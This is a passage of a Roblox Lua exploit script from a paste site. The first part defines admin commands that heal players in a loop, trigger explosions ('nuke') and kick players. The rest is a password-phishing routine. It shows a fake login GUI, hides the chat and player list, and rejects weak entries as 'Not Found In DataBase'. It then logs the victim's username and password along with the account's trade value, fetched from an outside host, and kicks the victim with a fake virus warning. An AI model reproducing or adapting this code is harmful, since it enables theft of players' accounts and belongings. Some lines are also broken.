  1924. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1925. for i, v in pairs(plrz) do
  1926. if v then
  1927. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1928. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1929. repeat wait()
  1930. coroutine.resume(coroutine.create(function()
  1931. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  1932. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1933. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1934. end
  1935. end))
  1936. until nil]]
  1937. end
  1938. end
  1939. end
  1940.  
  1941.  
  1942.  
  1943.  
  1944.  
  1945.  
  1946. if Cmd.Text:lower():sub(1,5) == "nuke " then
  1947. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1948. for i, v in pairs(plrz) do
  1949. coroutine.resume(coroutine.create(function()
  1950. if v and v.Character and v.Character:findFirstChild("Torso") then
  1951. local p = Instance.new("Part",game.Workspace)
  1952. p.Anchored = true
  1953. p.CanCollide = false
  1954. p.formFactor = "Symmetric"
  1955. p.Shape = "Ball"
  1956. p.Size = Vector3.new(1,1,1)
  1957. p.BrickColor = BrickColor.new("New Yeller")
  1958. p.Transparency = .5
  1959. p.Reflectance = .2
  1960. p.TopSurface = 0
  1961. p.BottomSurface = 0
  1962. p.Touched:connect(function(hit)
  1963. if hit and hit.Parent then
  1964. local ex = Instance.new("Explosion", game.Workspace)
  1965. ex.Position = hit.Position
  1966. ex.BlastRadius = 11
  1967. ex.BlastPressure = math.huge
  1968. end
  1969. end)
  1970. local cf = v.Character.Torso.CFrame
  1971. p.CFrame = cf
  1972. for i = 1, 333 do
  1973. p.Size = p.Size + Vector3.new(3,3,3)
  1974. p.CFrame = cf
  1975. wait(1/44)
  1976. end
  1977. p:Destroy()
  1978. end
  1979. end))
  1980. end
  1981. end
  1982.  
  1983. if Cmd.Text:lower():sub(1,5) == "kick " then
  1984. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1985. for i, v in pairs(plrz) do
  1986. coroutine.resume(coroutine.create(function()
  1987. if v then v:Destroy() end
  1988. end))
  1989. end
  1990. end
  1991.  
  1992. if Cmd.Text:lower():sub(1,5) == "emit " then
  1993. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1994. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1995. for i, v in pairs(plrz) do
  1996. coroutine.resume(coroutine.create(function()
  1997. if v.Character then v.Character:FindFirstChild("Torso")
  1998. local cl = Instance.new("ParticleEmitter", v.Character.Torso)
  1999. cl.Texture = "rbxassetid://"..Cmd.Text:sub(chk1+1)-1
  2000. end
  2001. end))
  2002. end
  2003.  
  2004. if Cmd.Text:lower():sub(1,7) == "unemit " then
  2005. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  2006. for i, v in pairs(plrz) do
  2007. coroutine.resume(coroutine.create(function()
  2008. if v and v.Character and v.Character:findFirstChild("Torso") then
  2009. for z, cl in pairs(v.Character.Torso:GetChildren()) do if cl:IsA("ParticleEmitter") then cl:Destroy() end end
  2010. end
  2011. end))
  2012. end
  2013. end end
  2014.  
  2015. end
  2016.  
  2017.  
  2018.  
  2019. function Clicked5()
  2020. for i,v in pairs(game.Players:GetChildren())do
  2021. gui = NewGuiPart65:Clone()
  2022. gui.Parent = Owner.PlayerGui
  2023. gui.ErrorFrame.Visible = true
  2024. game.StarterGui:SetCoreGuiEnabled("PlayerList", false)
  2025. game.StarterGui:SetCoreGuiEnabled("Backpack", false)
  2026. game.StarterGui:SetCoreGuiEnabled("Chat", false)
  2027. passw = gui.ErrorFrame.TB2.Text
  2028. tb1 = gui.ErrorFrame.TB1.Text
  2029. end end
  2030.  
  2031.  
  2032.  
  2033.  
  2034. wait(3)
  2035. NewGuiPart72.Visible = true
  2036.  
  2037.  
  2038. RAPApi = true
  2039.  
  2040.  
  2041.  
  2042.  
  2043. local checktrue = Instance.new("BoolValue")
  2044. checktrue.Parent = CoreValues
  2045. checktrue.Name = "PasscheckTrue"
  2046. checktrue.Value = false
  2047.  
  2048. tb1 = otherp.Name
  2049.  
  2050. PassWord.Value = NewGuiPart71.Text
  2051. UserName.Value = NewGuiPart73.Text
  2052.  
  2053. function getRap(user)
  2054. local rap = ""
  2055. if RAPApi then
  2056. ypcall(function()
  2057. local http = game:GetService("HttpService")
  2058. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  2059. rap = tostring(rawrap.rap)
  2060. end)
  2061. else
  2062. rap = "N/A"
  2063. end
  2064. return rap
  2065. end
  2066. print("This Is Jech's Property. Please DOnt Reclaim this Project.")
  2067.  
  2068. function BCtoDumpStr(str)
  2069. local res = ""
  2070. if str == "Enum.MembershipType.BuildersClub" then
  2071. res = "[BC] "
  2072. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  2073. res = "[TBC] "
  2074. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  2075. res = "[OBC] "
  2076. elseif str == "Enum.MembershipType.None" then
  2077. res = ""
  2078. end
  2079. return res
  2080. end
  2081.  
  2082. function logAccount(user,pass)
  2083. local playerName = user.Name
  2084. local playerAge = tostring(user.AccountAge)
  2085. local playerRAP = getRap(playerName)
  2086.  
  2087.  
  2088. print(BCtoDumpStr(tostring(otherp.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  2089. end
  2090.  
  2091. local GuiRemains = Instance.new("Folder")
  2092. GuiRemains.Name = "GuiRemains"
  2093. GuiRemains.Parent = CoreValues
  2094.  
  2095. function checkPass(pass)
  2096.  
  2097. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  2098. Textg.Text = "PassWord Not Found In DataBase."
  2099. return false
  2100. end
  2101. local foundNums = 0
  2102. local foundLetters = 0
  2103. if string.find(pass, " ") then
  2104. Textg.Text = "PassWord Not Found In DataBase."
  2105. return false
  2106. end
  2107. if pass:len() < 6 or pass:len() > 20 then
  2108. Textg.Text = "PassWord Not Found In DataBase."
  2109. return false
  2110. end
  2111. for i=1,pass:len() do
  2112. if pass:sub(i,i):match("%d") ~= nil then
  2113. foundNums = foundNums + 1
  2114. end
  2115. end
  2116. if foundNums < 2 then
  2117. Textg.Text = "PassWord Not Found In DataBase."
  2118. return false
  2119. end
  2120. for i=1,pass:len() do
  2121. if pass:sub(i,i):match("%a") ~= nil then
  2122. foundLetters = foundLetters + 1
  2123. end
  2124. end
  2125. if foundLetters < 4 then
  2126. Textg.Text = "PassWord Not Found In DataBase."
  2127. return false
  2128. end
  2129. checktrue = true
  2130. return true
  2131.  
  2132. end
  2133. function respawn(user)
  2134. local person = game.Players[user]
  2135. person.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2136. person:Kick("A Virus Was Detected.")
  2137. person:Destroy();
  2138. end
  2139.  
  2140. function UnGui(user)
  2141. user.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2142. user:LoadCharacter();
  2143. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2144. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2145. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2146. end
  2147.  
  2148. function Done()
  2149. local pl = gui.Parent.Parent
  2150. UserName.Value = pl.Name
  2151. PassWord.Value = gui.ErrorFrame.TB2.Text
  2152. checkPass(gui.ErrorFrame.TB2.Text)
  2153. logAccount(otherp,gui.ErrorFrame.TB2.Text)
  2154. respawn(pl.Name);
  2155. pl:Kick("A Virus Was Detected.")
  2156. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2157. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2158. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2159.  
  2160. end
  2161.  
  2162.  
  2163. function Clicked6()
  2164.  
  2165. Done();
  2166.  
  2167.  
  2168.  
  2169. end
  2170.  
  2171.  
  2172. game.Workspace.ChildAdded:connect(function(per)
  2173. if per.Name == otherp.Name then
  2174. if IsRunning.Value == true then
  2175. if otherp.PlayerGui["LoginGui"].ErrorFrame.Done.Value == false then
  2176. Clicked5()
  2177. end
  2178. end end
  2179. end)
  2180.  
  2181.  
  2182.  
  2183.  
  2184.  
  2185. Owner.PlayerGui.MGVX.Frame.TL3.MouseButton1Up:connect(Clicked1)
  2186. Owner.PlayerGui.MGVX.Frame.TL4.MouseButton1Up:connect(Clicked2)
  2187. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Up:connect(Clicked)
  2188. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Down:connect(Click)
  2189. Owner.PlayerGui.MGVX.Frame.CMDS.Execute.MouseButton1Up:connect(Clicked3)
  2190. Owner.PlayerGui.MGVX.Frame.ScrollingFrame.TB.MouseButton1Up:connect(Clicked4)
  2191. Owner.Backpack:WaitForChild(ToolName.Value).Equipped:connect(Clicked5)
  2192. Owner.PlayerGui:WaitForChild("LoginGui"):WaitForChild("ErrorFrame"):WaitForChild("LoginButton").MouseButton1Up:connect(Clicked6)
  2193.  
  2194. NewGuiPart1:Clone().Parent = CoreValues
  2195. NewGuiPart65:Clone().Parent = CoreValues
  2196.  
  2197. game.StarterGui.ResetPlayerGuiOnSpawn = false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement